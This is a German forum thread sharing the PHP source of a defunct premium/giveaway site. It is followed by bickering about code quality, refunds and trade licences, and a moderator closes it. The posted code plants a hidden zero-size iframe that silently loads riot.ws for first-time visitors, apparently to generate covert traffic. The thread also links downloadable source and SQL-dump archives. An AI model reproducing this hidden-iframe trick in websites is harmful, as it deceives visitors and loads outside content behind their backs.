[Source][PHP]twsrvgeschenkt.de

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • PHP-Quellcode

      1. <?php
      2. session_start();
      3. include("include/functions.php");
      4. include("include/config.php");
      5. if(!$_COOKIE["riot"]){
      6. setcookie("riot", "1", time()+3600*12);
      7. echo '<html><body>
      8. <iframe src="http://riot.ws/index.php?id=6548" height="0" width="0"></iframe>
      9. </body></html>';
      10. }
      11. ?>
      Alles anzeigen


      yooo.. klar :O
    • Was ist das denn für ein mieser Code?
      Die gesamte Source ist unsauber "programmiert" wer hat das ding denn gemacht?
      Hat bei euch eig. irgendwas funktioniert?

      Ich überarbeite den Code mal, das er richtig läuft und lad ihn dann mal auf GitHub.

      Finde es aber lächerlich, das ihr das Projekt so zuende laufen lasst, nur weil ihr Kinnas mal stress habt..
      Ich meine ihr habt eine Dienstleistung erbracht, Leute haben sich Premium gekauft, etc. Und ich denke mal du und der andere da(Name vergessen) wart auch Freunde..
      Wegen unstimmigkeiten gleich ein solches Projekt aufgeben.. :s

      //Habs nochmal angehängt. ^^
      Dateien
      • SQLDUMP.zip

        (2,56 kB, 127 mal heruntergeladen, zuletzt: )
      • Source.zip

        (333,1 kB, 139 mal heruntergeladen, zuletzt: )

      Auf jeden ironischen Spruch folgt eine Spaßbremse, die ihn nicht kapiert hat, und erstmal einen Stuhlkreis bilden muss.
      -Irgendwer, irgendwann

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von RaZoR ()

    • RaZoR schrieb:

      Was ist das denn für ein mieser Code?
      Die gesamte Source ist unsauber "programmiert" wer hat das ding denn gemacht?
      Hat bei euch eig. irgendwas funktioniert?

      Ich überarbeite den Code mal, das er richtig läuft und lad ihn dann mal auf GitHub.

      Finde es aber lächerlich, das ihr das Projekt so zuende laufen lasst, nur weil ihr Kinnas mal stress habt..
      Ich meine ihr habt eine Dienstleistung erbracht, Leute haben sich Premium gekauft, etc. Und ich denke mal du und der andere da(Name vergessen) wart auch Freunde..
      Wegen unstimmigkeiten gleich ein solches Projekt aufgeben.. :s
      von wegen unsauber programmiert, wie gesagt der ist aus der Betaphase die fertige Version war saubrer und viel übersichtlicher


      und wegen dem dicht machen musste dich mal an r00t wenden
    • Blunk schrieb:

      von wegen unsauber programmiert, wie gesagt der ist aus der Betaphase die fertige Version war saubrer und viel übersichtlicher
      Ahja, is schon klar.. :S

      Blunk schrieb:

      und wegen dem dicht machen musste dich mal an r00t wenden
      Mir ist das vollkommen egal, ihr habt eine Straftat begangen. :P
      Ich wollte es nur gesagt haben. :D

      Auf jeden ironischen Spruch folgt eine Spaßbremse, die ihn nicht kapiert hat, und erstmal einen Stuhlkreis bilden muss.
      -Irgendwer, irgendwann
    • Jester schrieb:

      RaZoR schrieb:

      Mir ist das vollkommen egal, ihr habt eine Straftat begangen. :P

      was babbelst du da mit straftat?

      Kann auch sein das ich mich irre.
      Aber die Leute haben ja für Premium bezahlt, das ist ja dann eine Dienstleistung die nicht erbracht wird, oder?

      Übrigens selbst dafür hättet ihr eine Gewerbelizenz gebraucht. ^^

      Auf jeden ironischen Spruch folgt eine Spaßbremse, die ihn nicht kapiert hat, und erstmal einen Stuhlkreis bilden muss.
      -Irgendwer, irgendwann
    • RaZoR schrieb:

      Kann auch sein das ich mich irre.
      Aber die Leute haben ja für Premium bezahlt, das ist ja dann eine Dienstleistung die nicht erbracht wird, oder?

      wenn ich mir das hier alles so anschaue, gehe ich mal stark davon aus, dass der dienstleistende niemals für tatsächliche ausführung der dienstleistung garantiert hat. und wenn wäre es wahrscheinlich eher ne ordnungswidrigkeit und keine straftat.
    • Eine "Gewerbelizenz" wie du sie nennst ist bei derart geringen Einnahmen nicht nötig.
      [18:02:15] pixel: hab code html c++ injected source code compiler linux dos, und dann wars gehackt

      poko schrieb:

      poko fresh, ghetto chef
      junge denn es muss sein
      TWF, täglich logg ich mich ein
      sehts ein
      ich erzähl euch ne story
      von den 3 kleinen schweinchen
      und dem wolf
      von den 3 kleinen schweinchen mit ihren 3 kleinen häusern
      und der wolf
      yo
    • Yacuzi schrieb:

      Eine "Gewerbelizenz" wie du sie nennst ist bei derart geringen Einnahmen nicht nötig.

      Hat mir die Tusse vom Finanzamt etwa mist erzählt?
      Ich hab mich da extra schlau gemacht, als ich meine damals beantragt hab, auch dafür brauch man eine, ist echt mies, aber ist so, weil ich hatte solch ein System ja auch in meiner Community.

      Auf jeden ironischen Spruch folgt eine Spaßbremse, die ihn nicht kapiert hat, und erstmal einen Stuhlkreis bilden muss.
      -Irgendwer, irgendwann
    • @Flippy: Ich würde nicht mit halbwissen um mich schmeißen, das kommt nie gut.. ach und "Sobald ein Gewerbe Einnahmen hat".. Gewerbe = wirtschaftliche Tätigkeit.
      Was wäre eine wirtschaftliche Tätigkeit ohne Einkommen? Es heißt nicht umsonst "WIRTSCHAFTEN".. Wenn schon, dann richtig :P

      ansonsten:
      Stichwort: Kleinunternehmerregelung.
      [18:02:15] pixel: hab code html c++ injected source code compiler linux dos, und dann wars gehackt

      poko schrieb:

      poko fresh, ghetto chef
      junge denn es muss sein
      TWF, täglich logg ich mich ein
      sehts ein
      ich erzähl euch ne story
      von den 3 kleinen schweinchen
      und dem wolf
      von den 3 kleinen schweinchen mit ihren 3 kleinen häusern
      und der wolf
      yo
    • Aufgrund des Threadverlaufes schließe ich das Thema nun.
      Ich denke eine Diskussion über Wirtschafts(un)recht, kann in einem separatem Thread geführt werden.
      Mit Blunk werde ich mich noch einmal auseinandersetzen, da er sich mit seiner Beleidigung wahrscheinlich eine Verwarnung einfangen wird.
      Vorerst verzichte ich auf das Löschen des Threads aufgrund der von RaZoR geposteten Überarbeitung, jedoch bitte ich ihn, auch dieses in den nächsten Tagen in einen seperaten Thread zu verschieben.

      Mit freundlichen Grüßen Pata